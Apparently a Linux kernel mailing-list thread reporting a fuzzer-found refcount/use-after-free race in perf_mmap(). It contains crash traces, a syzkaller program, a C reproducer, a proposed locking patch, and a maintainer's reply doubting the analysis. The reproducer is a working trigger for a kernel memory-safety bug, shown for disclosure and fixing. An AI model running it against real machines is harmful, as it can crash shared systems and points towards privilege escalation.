pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 
= 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
On Mon, Feb 02, 2026 at 02:58:59PM +0100, Peter Zijlstra wrote:

I'm not seeing it; once perf_mmap_rb() completes, we should have
event->mmap_count != 0, and thus the IOC_SET_OUTPUT will fail.

Please provide a better explanation.
{ "author": "Peter Zijlstra <peterz@infradead.org>", "date": "Mon, 2 Feb 2026 15:36:15 +0100", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. 
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] 
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>

Reproduce
----------
The issue is reproducible using the C reproducer attached. 
The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow:

1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.

Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a use-after-free (UAF) condition. While the immediate symptom is typically a kernel warning or a denial of service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. 
If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.

Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap

The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it.

Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete.

Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
 kernel/events/core.c | 42 +++++++++++++++++++++---------------------
 1 file changed, 21 insertions(+), 21 deletions(-)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
 		ret = perf_mmap_aux(vma, event, nr_pages);
 		if (ret)
 			return ret;
-	}
-
-	/*
-	 * Since pinned accounting is per vm we cannot allow fork() to copy our
-	 * vma.
-	 */
-	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
-	vma->vm_ops = &perf_mmap_vmops;
-	mapped = get_mapped(event, event_mapped);
-	if (mapped)
-		mapped(event, vma->vm_mm);
-
-	/*
-	 * Try to map it into the page table. On fail, invoke
-	 * perf_mmap_close() to undo the above, as the callsite expects
-	 * full cleanup in this case and therefore does not invoke
-	 * vmops::close().
-	 */
-	ret = map_range(event->rb, vma);
-	if (ret)
-		perf_mmap_close(vma);
+		/*
+		 * Since pinned accounting is per vm we cannot allow fork() to copy our
+		 * vma.
+		 */
+		vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+		vma->vm_ops = &perf_mmap_vmops;
+
+		mapped = get_mapped(event, event_mapped);
+		if (mapped)
+			mapped(event, vma->vm_mm);
+
+		/*
+		 * Try to map it into the page table. On fail, invoke
+		 * perf_mmap_close() to undo the above, as the callsite expects
+		 * full cleanup in this case and therefore does not invoke
+		 * vmops::close().
+		 */
+		ret = map_range(event->rb, vma);
+		if (ret)
+			perf_mmap_close(vma);
+	}
 
 	return ret;
 }
-- 
2.51.0

Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.

Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.

audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free. 
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 
arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 
0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) 
\ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 
bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: 